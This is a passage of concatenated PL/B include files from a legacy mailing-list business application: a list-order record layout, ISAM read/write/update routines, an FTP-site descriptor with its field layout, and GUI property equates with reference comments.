NLOLFLD3 DIM 9 .OBSOLETE. LR Number(AAM)
NLOLFLD4 DIM 9
.NLOLFLD4 DIM 15 P.O. Number(AAM)
.NLOLFLD5 DIM 5 Contact(AAM)
NLOLFLAG FORM 1
NLOLFLG1 FORM 1
NLOLFLG2 FORM 1
NLOLPATH FORM 1
NLOLLOCK FORM 1 0/1=FILEPI, 2=RECORD LOCK, 3=NO LOCK
.
NLOL2 DIM 2 Used to Extract first 2 bytes
NLOL24 DIM 24 Used to Extract next 24 Bytes(ALL Keys!!) w/o destroying preserved values
NLOLVARS LIST
NLOLCode DIM 1 001-001 Code for Busy byte
NLOLStat DIM 1 002-002 LOL Status
NLOLLOL DIM 6 003-008 LOL Number - Hidden value!!!!!
NLOLCNum DIM 6 009-014 Campaign Num(Key + AAMKey 1)
NLOLList DIM 6 015-020 List Number(Key + AAMKey 1)
NLOLLCR DIM 6 021-026 Associated LR Number(AAMKey 2) - created from this record
NLOLOwner DIM 4 027-030 Owner Number
NLOLSelect DIM 35 031-065 Select
.NLOLUniverse DIM 9 066-074 List Universe
NLOLUniverse DIM 10 066-075 List Universe - OBSOLETE AFTER DATACARD CONVERSION
NLOLDate DIM 8 076-083 Record Date
NLOLModDate DIM 8 084-091 Modification Date
NLOLInits DIM 3 092-094 Modification Initials
NLOLQty DIM 9 095-103 Quantity
NLOLNetQty DIM 9 104-112 Net Quantity
NLOLTest DIM 1 113-113 Test/Continuation ' '/0=Cont 1=Test, 2=Retest
NLOLRent DIM 1 114-114 Exchange/Rent 1=Exchange, 2=Rent, 3=Exchange/Rent
.NLOLPrice DIM 6 114-119 Average Price per Thousand
NLOLPrice DIM 7 115-121 Average Price per Thousand
NLOLNet DIM 6 122-127 Average Net %
NLOLRate DIM 6 128-133 Response Rate Change %
NLOLGift DIM 6 134-139 Gift Change %
NLOLNetReq DIM 6 140-145 Net Requested %
NLOLNetApp DIM 6 146-151 Net Approved %
NLOLRegional DIM 1 152-152 Regional
.----------VARIANCE FIELDS----------- CAMPAIGN WILL CONTAIN MASTER
NLOLOffer DIM 3 153-155 Offer
NLOLSample DIM 3 156-158 Sample
NLOLPackage DIM 2 159-160 Package
NLOLMDate DIM 8 161-168 Mail Date
.
NLOLComment DIM 150 169-318 Internal Special Instructions - copies over to NINSPEC1.DAT when Order record created
NLOLComment1 DIM 150 319-468 External Special Instructions
NLOLLR DIM 6 469-474 LR Master record - used to create this record
.LOLFiller DIM 44 473-516 Filler
NLOLFiller DIM 42 475-516 Filler
listend
<file_sep>/include/SRDSTXTIO.inc
..............................................................................
.******************************************************
.* SRDSTXT List FILE DESCRIPTORS.
.. ....................................................
.* ****************************************************
.* SRDSTXT DATACARD FILES.
.* ****************************************************
.
...............................................
. ENTRY POINT : SRDSTXTKEY
. REQUIRED : 'SRDSTXTFld'
. RETURNED : RECORD
. DESCRIPTION : EXACT ISAM KEY READ
. APPLICATION'S RESPONSIBILITY TO TEST FLAGS
.
SRDSTXTKEY Branch SRDSTXTPATH TO SRDSTXT1a,SRDSTXT1c
SRDSTXT1a BRANCH SRDSTXTFlag TO SRDSTXT1b
CALL SRDSTXTOpen
SRDSTXT1b FILEPI 1;SRDSTXTFile
READ SRDSTXTFile,SRDSTXTFld;SRDSTXTVars
RETURN
SRDSTXT1c BRANCH SRDSTXTFlag TO SRDSTXT1d
CALL SRDSTXTOpen
SRDSTXT1d FILEPI 1;SRDSTXTFle1
READ SRDSTXTFle1,SRDSTXTFld1;SRDSTXTVars
RETURN
..............................................................................
.
. ENTRY POINT : SRDSTXTTST
. REQUIRED : SRDSTXTFld
. RETURNED :
. DESCRIPTION : TEST KEY
.
SRDSTXTTST Branch SRDSTXTPATH TO SRDSTXT2a,SRDSTXT2c
SRDSTXT2a BRANCH SRDSTXTFlag TO SRDSTXT2b
CALL SRDSTXTOpen
SRDSTXT2b FILEPI 1;SRDSTXTFile
READ SRDSTXTFile,SRDSTXTFld;STR1
RETURN
SRDSTXT2c BRANCH SRDSTXTFlag TO SRDSTXT2d
CALL SRDSTXTOpen
SRDSTXT2d FILEPI 1;SRDSTXTFle1
READ SRDSTXTFle1,SRDSTXTFld1;STR1
RETURN
..............................................................................
.
. ENTRY POINT : SRDSTXTKS
. REQUIRED :
. RETURNED : SRDSTXT Main Record
. DESCRIPTION : KEY SEQUENTIAL MDC MainFILE READ
.
SRDSTXTKS Branch SRDSTXTPATH TO SRDSTXT3a,SRDSTXT3c
SRDSTXT3a BRANCH SRDSTXTFlag TO SRDSTXT3b
CALL SRDSTXTOpen
SRDSTXT3b FILEPI 1;SRDSTXTFile
READKS SRDSTXTFile;SRDSTXTVars
RETURN
SRDSTXT3c BRANCH SRDSTXTFlag TO SRDSTXT3b
CALL SRDSTXTOpen
SRDSTXT3d FILEPI 1;SRDSTXTFle1
READKS SRDSTXTFle1;SRDSTXTVars
RETURN
..............................................................................
. ENTRY POINT : SRDSTXTSEQ
. REQUIRED :
. RETURNED : SRDSTXT Main Record
. DESCRIPTION : SEQUENTIAL MDC MainFILE READ
. APPLICATION'S RESPONSIBILITY TO TEST FLGS
.
SRDSTXTSEQ BRANCH SRDSTXTFlag TO SRDSTXT4
CALL SRDSTXTOpen
SRDSTXT4 FILEPI 1;SRDSTXTFile
READ SRDSTXTFile,SEQ;SRDSTXTVars
RETURN
..............................................................................
.
. ENTRY POINT : SRDSTXTWRT
. REQUIRED : 'SRDSTXTFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI INSERT
.
SRDSTXTWRT BRANCH SRDSTXTFlag TO SRDSTXT5
CALL SRDSTXTOpen
SRDSTXT5 FILEPI 1;SRDSTXTFlist
WRITE SRDSTXTFlist;SRDSTXTVars
RETURN
..............................................................................
.
. ENTRY POINT : SRDSTXTUPD
. REQUIRED : A PREVIOUS KEY READ
. RETURNED :
. DESCRIPTION : KEY UPDATE MDC MainFILE
.
SRDSTXTUPD BRANCH SRDSTXTFlag TO SRDSTXT6
CALL SRDSTXTOpen
SRDSTXT6
FILEPI 1;SRDSTXTFlist
UPDATE SRDSTXTFlist;SRDSTXTVars
RETURN
..............................................................................
.
. ENTRY POINT : SRDSTXTDEL
. REQUIRED : 'SRDSTXTFld'
. RETURNED :
. DESCRIPTION : EXACT ISAM KEY TXT/ISI DELETE
.
SRDSTXTDEL BRANCH SRDSTXTFlag TO SRDSTXT7
CALL SRDSTXTOpen
SRDSTXT7 FILEPI 1;SRDSTXTFlist
DELETE SRDSTXTFList
RETURN
..............................................................................
.
. ENTRY POINT : SRDSTXTOpen
. REQUIRED : 'SRDSTXTFlag' 'SRDSTXTPATH'
. RETURNED : 'SRDSTXTFlag' SET TO '1' IF OPENNED
. DESCRIPTION : OPEN NIN MDC MainFILE
. DISPLAY ERROR AND ABORT IF NOT ON-LINE.
.
SRDSTXTOpen TRAP SRDSTXTGONE giving error IF IO
OPEN SRDSTXTFList
TRAPCLR IO
MOVE C1 TO SRDSTXTFlag
RETURN
..............................................................................
SRDSTXTGONE MOVE SRDSTXTNAME TO FILENAME
CALL FILEGONE
.
..............................................................................
<file_sep>/include/nftpdd.inc
.//******************************************************
.// NFTPDD INCLUSION
.// SUBSIDIARY FILE FOR DATACARD
.// ADDRESSING FILE DESCRIPTOR.
.//****************************************************
.// NAMES IN THE NEWS MASTER ADDRESSING FILE.
.//****************************************************]
.// FILE: NINFTP
.// LENGTH: 1024
.// TYPE: SEQ
......................................................
NFTPNAME INIT "NINFTP"
NFTPFLD DIM 9
NFTPFLD1 DIM 9
NFTPLOCK FORM 1 .0 OR 1=filepi,2=recordlock, 3=no lock
NFTPFLAG FORM 1
NFTPPATH FORM 1
NFTPFILE FILE
NFTPFLIST FILELIST
NFTPFILE1 IFILE KEYLEN=9,Name="NINFTP.isi|NINS1:502"
NFTPFLE2 AFILE Name="NINFTP.aam|NINS1:502"
FILELISTEND
.Note description should have no spaces so Winbatch FTP jobs process records correctly when using (Parse)
.//FTP Information File - NINFTP
NFTPCOMP DIM 6 .Eventually Fulfillment Company Number .1-6
NFTPCOMPID DIM 3 .Counter for mulitple sites .7-9
NFTPDESC DIM 100 .Company Description .10-109
NFTPPROTOCOL DIM 50 .FTP/FTPS .110-159
NFTPADDRESS DIM 255 .Ftp Address .160-414
NFTPUSERNAME DIM 255 .User Name .415-669
NFTPPASSWORD DIM 255 .Password .<PASSWORD>
.begin patch
NFTPIP Dim 15 .IP address xxx.xxx.xxx.xxx
NFTPFILLER Dim 85
.NFTPFiller DIM 100 .Filler .925-1024
.end patch
.//Varlist NFTP
NFTPVARS VARLIST NFTPCOMP:
NFTPCOMPID:
NFTPDESC:
NFTPPROTOCOL:
NFTPADDRESS:
NFTPUSERNAME:
NFTPPASSWORD:
NFTPIP:
NFTPFiller
<file_sep>/include/PLBEQU.INC
*==============================================================================
. GUI designer support equates
.
. Last Revision Date: 22 Apr 1997
.
. Revision History:
.
.:: 15 Jan 97 - Create PLB equate include definitions. :8.1
.:: 06 Feb 96 - Added ICON to APPEARANCE property. :8.1
.:: - Added GROUPID to DROPID property. :8.1
.:: - Added SHAPE to BGCOLOR and BDRCOLOR properties. :8.1
.:: 25 Feb - Added LINKHSCROLL and LINKVSCROLL. :8.1
.:: 05 Mar - Added AUTOSCALE, PICTSIZEH, PICTSIZEV, and WINPOS. :8.1
.:: 02 Apr - Changed EDITTYPE to use DECIMAL and INTEGER :8.1
.:: 22 Apr - Added LINE object. :8.1
.:: - Added X1, X2, Y1, and Y2 properties for LINE object. :8.1
.::
.
*------------------------------------------------------------------------------
. General Usage Equates
.
$ON EQU 1
$OFF EQU 0
$NONE EQU 0
.
*------------------------------------------------------------------------------
. Event Type Indicators
.
$LOAD EQU 0
$ACTIVATE EQU 1
$DEACTIVATE EQU 2
$CHANGE EQU 3
$CLICK EQU 4
$CLOSE EQU 5
$DBLCLICK EQU 6
$DRAGDROP EQU 7
$DRAGOVER EQU 8
$GOTFOCUS EQU 9
$KEYPRESS EQU 10
$LOSTFOCUS EQU 11
$MOVE EQU 12
$MOUSEDOWN EQU 13
$MOUSEUP EQU 14
$MOUSEMOVE EQU 15
$PAINT EQU 16
$RESIZE EQU 17
$TIMER EQU 18
$OLDEVENT EQU 19
$FORMINIT EQU 20
.
*==============================================================================
. Object Properties
.
*------------------------------------------------------------------------------
. ALIGNMENT=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. The ALIGNMENT property defines how the text is to be output
. horizontally for the object.
.
. Note1: The EDITTEXT object doesn't support changing of this property
. using the SETPROP statement.
.
. Objects:
. EDITTEXT
. STATTEXT
.
. dnumnvar values:
.
.$NONE EQU 0 // Default
$CENTER EQU 1
$LEFT EQU 2
$RIGHT EQU 3
.
*------------------------------------------------------------------------------
. APPEARANCE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. The APPEARANCE property specifies when an object should
. have a 3D look or a non-3D look. This property should replace
. the STYLE property for these objects. If this property is
. not specified, the default appearance is determined by the
. current SETMODE *3D state. If the SETMODE *3D state has not
. been specified, then the appearance defaults to be the same
. as defined for the window.
.
. Note: Under Windows95 these objects always have a 3D presentation
. regardless of the control value provided.
.
. Objects:
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. ICON
. POPUPMENU (OBSELETE)
. RADIO
. RADIOGRP
. WINDOW
.
. dnumnvar values:
.
$3D EQU 1
$FLAT EQU 2
.
*------------------------------------------------------------------------------
. AUTOREDRAW=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. When this property is set to zero, then the repainting of the
. object is disabled. When this property is set to one, then the
. repainting of the objects takes place as normal.
.
. Objects:
. COMBOBOX
. DATALIST
. POPUPMENU (OBSELETE)
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0
.$ON EQU 1 // Default
.
*------------------------------------------------------------------------------
. AUTOSCALE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies how a picture should be scaled to fit
. pict object rectangle coordinates. This property is overridden
. by the RESIZE property.
.
. Objects:
. PICT
.
. dnumnvar values:
.
.$NONE EQU 0
$SCALEBEST EQU 1 // Default
$SCALEHORZ EQU 2
$SCALENONE EQU 3 // Same as RESIZE=$OFF
$SCALEVERT EQU 4
.
*------------------------------------------------------------------------------
. AUTOSIZE[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property defines if the bottom border is to be adjusted
. automatically to fit the number of items specified. If the
. AUTOSIZE property is not specified the default action is to
. not resize the bottom border. If the AUTOSIZE property is
. specified without an assignment, the action is the same as
. if AUTOSIZE=1 where given.
.
. Objects:
. CHECKGRP
. RADIOGRP
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. AUTOZOOM[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property enables or disables the zooming capabilty for
. a pict object.
.
. Objects:
. PICT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. BACKSTYLE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property defines the type of background to be used for
. supported objects. The BACKSTYLE can be OPAQUE which prevents
. underlying objects from showing through this object. The can
. BACKSTYLE can also be TRANSPARENT which allows underlying
. objects to show through the supported objects.
.
. Objects:
. GROUPBOX
. SHAPE
. STATTEXT
.
. dnumnvar values:
.
.$NONE EQU 0 // Default
$OPAQUE EQU 1
$TRANSPARENT EQU 2
.
*------------------------------------------------------------------------------
. BDRCOLOR=dnumnvar|color object CREATE SETPROP GETPROP
.
. Description:
. This property allows the color of the BORDER to be specified by
. the user program. If the BDRCOLOR parameter is a <color object>,
. then the <color object> must be created before it is used. The
. <dnumnvar> value can also be used to specify the color as a
. RGB value or a Windows system color index. The <dnumnvar> value
. can be thought of as 4 byte values. When the high order byte
. contains a value of 0x00, then the next 3 bytes (24 bits) get
. interpreted as a RGB value. When the high order byte has a value
. of 0x80, then the lower order byte is used as an index value into
. the Windows System colors. The Windows system colors can be
. defined by the user under Windows 95 and Windows NT.
.
. Index Value Meaning
.
. COLOR_ACTIVEBORDER Active window border.
. COLOR_ACTIVECAPTION Active window caption.
. COLOR_APPWORKSPACE Background color of multiple
. document interface (MDI) applications.
. COLOR_BACKGROUND Desktop.
. COLOR_BTNFACE Face shading on push buttons.
. COLOR_BTNSHADOW Edge shading on push buttons.
. COLOR_BTNTEXT Text on push buttons.
. COLOR_CAPTIONTEXT Text in caption, size box,
. and scroll bar arrow box.
. COLOR_GRAYTEXT Grayed (disabled) text.
. This color is set to 0 if the
. current display driver does not
. support a solid gray color.
. COLOR_HIGHLIGHT Item(s) selected in a control.
. COLOR_HIGHLIGHTTEXT Text of item(s) selected in a control.
. COLOR_INACTIVEBORDER Inactive window border.
. COLOR_INACTIVECAPTION Inactive window caption.
. COLOR_INACTIVECAPTIONTEXT Color of text in an inactive
. caption.
. COLOR_MENU Menu background.
. COLOR_MENUTEXT Text in menus.
. COLOR_SCROLLBAR Scroll bar gray area.
. COLOR_SHADOW Color of automatic window shadows.
. COLOR_WINDOW Window background.
. COLOR_WINDOWFRAME Window frame.
. COLOR_WINDOWTEXT Text in windows.
.
.
. Objects:
. STATTEXT
. GROUPBOX
. PROGRESS
. CHECKGRP
. EDITTEXT
. LINE
. MOVIE
. PICT
. RADIOGRP
. SHAPE
.
. dnumnvar values:
.
$SCROLLBAR CONST "2147483648" ;Hex value 0x80000000
$BACKGROUND CONST "2147483649" ;Hex value 0x80000001
$ACTIVECAPTION CONST "2147483650" ;Hex value 0x80000002
$INACTIVECAPTION CONST "2147483651" ;Hex value 0x80000003
$MENU CONST "2147483652" ;Hex value 0x80000004
$WINDOW CONST "2147483653" ;Hex value 0x80000005
$WINDOWFRAME CONST "2147483654" ;Hex value 0x80000006
$MENUTEXT CONST "2147483655" ;Hex value 0x80000007
$WINDOWTEXT CONST "2147483656" ;Hex value 0x80000008
$CAPTIONTEXT CONST "2147483657" ;Hex value 0x80000009
$ACTIVEBORDER CONST "2147483658" ;Hex value 0x8000000A
$INACTIVEBORDER CONST "2147483659" ;Hex value 0x8000000B
$APPWORKSPACE CONST "2147483660" ;Hex value 0x8000000C
$HIGHLIGHT CONST "2147483661" ;Hex value 0x8000000D
$HIGHLIGHTTEXT CONST "2147483662" ;Hex value 0x8000000E
$BTNFACE CONST "2147483663" ;Hex value 0x8000000F
$BTNSHADOW CONST "2147483664" ;Hex value 0x80000010
$GRAYTEXT CONST "2147483665" ;Hex value 0x80000011
$BTNTEXT CONST "2147483666" ;Hex value 0x80000012
$INACTIVECAPTIONTEXT CONST "2147483667" ;Hex value 0x80000013
$BTNHIGHLIGHT CONST "2147483668" ;Hex value 0x80000014
.
*------------------------------------------------------------------------------
. BDRPATTERN=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property allows the user to specify the type of border
. pattern is to be used for the object. The possible border
. patterns are as follows:
.
. Dash - Pen is dashed.
. DashDot - Pen has alternating dashes and dots.
. DashDot2 - Pen has dashes and double dots.
. Dot - Pen is dotted.
. InsideFrame - Pen is solid. The figure and border is created
. inside the frame defined by the user specified
. rectangle.
. Solid - Pen is solid.
. None - Pen defaults to solid.
.
. Note1: The border pattern only takes affect when the BDRWIDTH
. property has a value of 1.
.
. Objects:
. LINE
. SHAPE
.
. dnumnvar values:
.
.$NONE EQU 0 // Default
$DASH EQU 1
$DASHDOT EQU 2
$DASHDOT2 EQU 3
$DOT EQU 4
$INSIDEFRAME EQU 5
$SOLID EQU 6
.
*------------------------------------------------------------------------------
. BDRWIDTH=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property defines the width of the pen used to draw the
. object.
.
. Note1: The border pattern only takes affect when the BDRWIDTH
. property has a value of 1.
.
. Objects:
. LINE
. SHAPE
.
. dnumnvar values:
.
. The <dnumnvar> value specifies number of pixels for width.
.
*------------------------------------------------------------------------------
. BGCOLOR=dnumnvar|color object CREATE SETPROP GETPROP
.
. Description:
. This property allows the user program to specify the color to
. be used for the background color. The parameter description
. is the same as for the BDRCOLOR property.
.
. Objects:
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. EDITTEXT
. GROUPBOX
. HSCROLLBAR
. PICT
. POPUPMENU ( OBSELETE )
. PROGRESS
. RADIOGRP
. RADIO
. SHAPE
. STATTEXT
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
. See the BDRCOLOR property for the color equate values.
.
*------------------------------------------------------------------------------
. BOLD[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that the font should be bolded. When
. the <dnumnvar> value is not provided, this indicates that the
. BOLD is turned on.
.
. Objects:
. FONT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. BORDER[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property defines when an object is to have a border.
. If the <dnumnvar> parameter is not provided, this indicates that
. the border is to be used.
.
. Objects:
. CHECKGRP
. EDITTEXT
. MOVIE
. PICT
. RADIOGRP
. SLIDER
. STATTEXT
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. CANCEL[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that the BUTTON object activation routine
. is to gain program control when the escape key is entered.
.
. Objects:
. BUTTON
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. CAPTION=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property allows a user to specify if a Window is to be
. created with or without a title bar. This property is
. provided to the OS to eliminate/retain the caption bar as
. appropriate.
.
. NOTE1: Under Windows95 and Win32s, the CAPTION property will
. have an effect on a MODAL or MODELESS window. The
. CAPTION property does not have an affect on the PRIMARY
. window types.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0
.$ON EQU 1 // Default
.
*------------------------------------------------------------------------------
. CENTER[=dnumnvar] CREATE
.
. Description:
. The CENTER property specifies that the text is to be centered
. horizontally for the object. The property is replaced with
. the ALIGNMENT property. The ALIGNMENT property is to be used
. for performing SETPROP and GETPROP operations.
.
. If the syntax form is used where the <dnumnvar> value is not
. specified, this indicates that the CENTER property is to be
. turned on.
.
. Also note that if the CENTER property is turned off, this causes
. the text output to be justified to the left.
.
. Objects:
. EDITTEXT
. STATTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. CENTERPOS=dnumnvar CREATE
.
. Description:
. When the user defined rectangle is larger than the EDITTEXT
. object, this property controls whether the EDITTEXT object is to
. be centered TOP/BOTTOM or not. The default action is to
. have the EDITTEXT object centered TOP/BOTTOM within the user
. defined rectangle parameters. If the CENTERPOS property is
. set to $TOPLEFTPOS, then the CREATE action is to have the
. EDITTEXT object rectangle be located at the TOP/LEFT coordinates.
.
. Objects:A
. EDITTEXT
.
. dnumnvar values:
.
$CENTERPOS EQU 0 // Default
$TOPLEFTPOS EQU 1
.
*------------------------------------------------------------------------------
. CLIPCTRL=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. Excludes the area occupied by child windows/objects when
. drawing within the parent window. If the property is turned
. on, this can slow the performance of drawing objects due to
. OS overhead in determining valid clipping regions.
.
. Objects:
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. COMBOSTYLE=dnumnvar CREATE GETPROP
.
. Description:
. The COMBOSTYLE property specifies the type of COMBOBOX window
. object to be generated. A default combobox list object is a
. combox with a drop down list where the combox does not have
. an editable capability. The $EDIT <dnumnvar> value
. defines a combobox list like the default except the combobox
. does allow editing capability. Only the current selection field
. can be edited. The $SIMPLE <dnumnvar> value is the
. same as the $EDIT except the list is always present.
.
. Objects:
. COMBOBOX
. POPUPMENU ( OBSELETE )
.
. dnumnvar values:
.
.$NONE EQU 0 // Same as $LIST
$EDIT EQU 1
$LIST EQU 2 // Default
$SIMPLE EQU 3
.
*------------------------------------------------------------------------------
. DATA=svarslit CREATE SETPROP GETPROP
.
. Description:
. This property allows the items in a DATALIST to be initialized using
. a string composed of a list of items with each item separated with
. semi-colon.
.
. Objects:
. DATALIST
.
. svarslit value:
.
. String of semicolon separated list items.
.
*------------------------------------------------------------------------------
. DEFAULT[=dnumnvar] CREATE SETPROP GETPROP
.
. Description:
. This property specifies that the BUTTON object activation routine
. is to gain program control when the enter key is entered and
. a non-button object has the focus. However, if a button object
. other than the DEFAULT button object has the focus when the enter
. key is entered, then the activation routine of the button object
. with the focus gains the program control.
.
. Note1: The operation when a button object other than the DEFAULT
. button object has the focus is different from prior releases
. to release 8.1.
.
. Objects:
. BUTTON
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. DIGITS[=dnumnvar] CREATE
.
. Description:
. This property is a CREATE only property.
. The property specifies that the EDITTEXT object is to only
. allow numeric digits 0 through 9. When this property is set to
. indicate off state, then this indicates that all characters are
. allowed.
.
. Note1: Use of the property should be replaced through use of
. the EDITTYPE property.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. DRAWMODE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the current foreground mix mode.
. The foreground mix mode defines how colors from the object
. and the colors in the existing presentation image are to be
. combined.
.
. The following is a Windows summary of the drawmodes.
.
. Mix mode Description
.
. BLACKNESS Pixel is always 0.
.
. COPYPEN Pixel is the pen color.
.
. INVERT Pixel is the inverse of the screen color.
.
. MASKNOTPEN Pixel is a combination of the colors common
. to both the screen and the inverse of the pen.
.
. MASKPEN Pixel is a combination of the colors common
. to both the pen and the screen.
.
. MASKPENNOT Pixel is a combination of the colors common
. to both the pen and the inverse of the screen.
.
. MERGENOTPEN Pixel is a combination of the screen color and
. the inverse of the pen color.
.
. MERGEPEN Pixel is a combination of the pen color and
. the screen color.
.
. MERGEPENNOT Pixel is a combination of the pen color and
. the inverse of the screen color.
.
. NOP Pixel remains unchanged.
.
. NOTCOPYPEN Pixel is the inverse of the pen color.
.
. NOTMASKPEN Pixel is the inverse of the MASKPEN color.
.
. NOTMERGEPEN Pixel is the inverse of the MERGEPEN color.
.
. NOTXORPEN Pixel is the inverse of the XORPEN color.
.
. WHITENESS Pixel is always 1.
.
. XORPEN Pixel is a combination of the pen color and
. the screen color, but not in both.
.
. Objects:
. LINE
. SHAPE
.
. dnumnvar values:
.
.$NONE EQU 0 //Same as default
$BLACKNESS EQU 1
$COPYPEN EQU 2 //Default
$INVERT EQU 3
$MASKNOTPEN EQU 4
$MASKPEN EQU 5
$MASKPENNOT EQU 6
$MERGENOTPEN EQU 7
$MERGEPEN EQU 8
$MERGEPENNOT EQU 9
$NOP EQU 10
$NOTCOPYPEN EQU 11
$NOTMASKPEN EQU 12
$NOTMERGEPEN EQU 13
$NOTXORPEN EQU 14
$WHITENESS EQU 15
$XORPEN EQU 16
.
*------------------------------------------------------------------------------
. DROPID=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. When this property is specified, then the object which has the
. DROPID property can receive an item drop action. The value of
. the DROPID is sent to the activation routine of the object which
. is being dragged.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. EDITTEXT
. GROUPBOX
. HSCROLLBAR
. ICON
. MOVIE
. PICT
. POPUPMENU ( OBSELETE )
. PROGRESS
. RADIOGRP
. RADIO
. SHAPE
. SLIDER
. STATTEXT
. TABCONTROL
. VSCROLLBAR
.
. dnumnvar values:
.
*------------------------------------------------------------------------------
. EDITHIDESEL=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property negates the default behavior for EDITTEXT object.
. The default behavior hides the selection when the edittext
. loses the input focus and inverts the selection when the
. edittext receives the input focus. If this property is turned
. on, the selected text is inverted, even if the edittext does
. not have the focus.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$OFF EQU 0 // Default
.$ON EQU 1
.
*------------------------------------------------------------------------------
. EDITTYPE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies the type of edittext object as follows:
.
. ALL - Allow data entry of any keyed characters.
.
. DECIMAL - Only allow data entry into the edittext
. of numeric digits ( 0 through 9 ), '-',
. and '.'.
. INTEGER - Only allow data entry into the edittext
. of numeric digits only. ( 0 through 9 ).
. LOWERCASE - Convert all characters to lowercase as they
. are entered into the edittext.
. UPPERCASE - Convert all characters to uppercase as they
. are entered into the edittext.
.
. Note1: This property should be used in place of older properties
. which provide the same functions.
.
. Objects:
. EDITTEXT
.
. dnumnvar values:
.
.$NONE EQU 0 // Default
$ALL EQU 1
$DECIMAL EQU 2
$INTEGER EQU 3
$LOWERCASE EQU 4
$UPPERCASE EQU 5
.
*------------------------------------------------------------------------------
. ENABLED=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property specifies when an object is to be DISABLED/ENABLED.
. If the ENABLED property is set to $OFF for the CREATE/SETPROP
. statements, this is the same as if a DISABLEITEM with an ITEMNO
. value of zero was executed for the object. If the ENABLED
. property is set to $ON for the SETPROP, this is the same as if
. an ENABLEITEM with an ITEMNO valueo of zero was executed for the
. object. The GETPROP statement returns the current DISABLED/ENABLED
. state for the object.
.
. Note1: If the ENABLED property is set to $OFF for the objects
. ICON, MREGION, MOVIE, GROUPBOX, or PROGRESS there is
. no visible graying which identifies that the object is
. disabled. However, there are no events processed for
. these object when the ENABLED property is set to $OFF.
.
. Objects:
. BUTTON
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. EDITTEXT
. GROUPBOX
. HSCROLLBAR
. ICON
. MREGION
. MOVIE
. PICT
. POPUPMENU
. PROGRESS
. RADIO
. RADIOGRP
. SHAPE
. SLIDER
. STATTEXT
. TABCONTROL
. VSCROLLBAR
. WINDOW
.
. dnumnvar values:
.
.$OFF EQU 0
.$ON EQU 1 // Default
.
*------------------------------------------------------------------------------
. EVENTFILTER=svarslit CREATE SETPROP GETPROP
.
. Description:
. This property specifies a string control structure which allows
. events for the edittext object to be controlled. See manual
. discussion under create for specific details.
.
. Objects:
. EDITTEXT
.
. svarslit values:
.
. The <svarslit> string is composed of 'Y' and 'N'
. characters which relate to a given edittext object
. event type by position in the string.
.
*------------------------------------------------------------------------------
. FGCOLOR=dnumnvar|color object CREATE SETPROP GETPROP
.
. Description:
. This property allows the user program to specify the color to
. be used for the foreground color of the object. The parameter
. description is the same as for the BDRCOLOR property.
.
. Objects:
. CHECKBOX
. CHECKGRP
. COMBOBOX
. DATALIST
. EDITTEXT
. GROUPBOX
. POPUPMENU ( OBSELETE )
. PROGRESS
. RADIOGRP
. RADIO
. STATTEXT
. WINDOW
.
. dnumnvar values:
.
. See BDRCOLOR property for details.
.
*------------------------------------------------------------------------------
. FILLCOLOR=dnumnvar|color object CREATE SETPROP GETPROP
.
. Description:
. This property specifies the color to be used when filling the
. shape object. Please see the description under BDRCOLOR for
. a detailed discussion of colors.
.
. Objects:
. SHAPE
.
. dnumnvar values:
.
. See BDRCOLOR property for details.
.
*------------------------------------------------------------------------------
. FILLSTYLE=dnumnvar CREATE SETPROP GETPROP
.
. Description:
. This property defines the type of hatch used to fill a shape
. object. The following is a summary of the types of hatches
. available under Windows.
.
. Value Meaning
.
. DOWNDIAG 45-degree downward left-to-right hatch
. CROSS Horizontal and vertical crosshatch
. DIAGCROSS 45-degree crosshatch
. UPDIAG 45-degree upward left-to-right hatch
. HORIZLINE Horizontal hatch
. VERTLINE Vertical hatch
. NOHATCH SHAPE object filled with solid color as
. specified by FILLCOLOR.
. CLEARHATCH SHAPE object fill area becomes transparent
. such that underlying colors show through
. the object.
.
. Objects:
. SHAPE
.
. dnumnvar values:
.
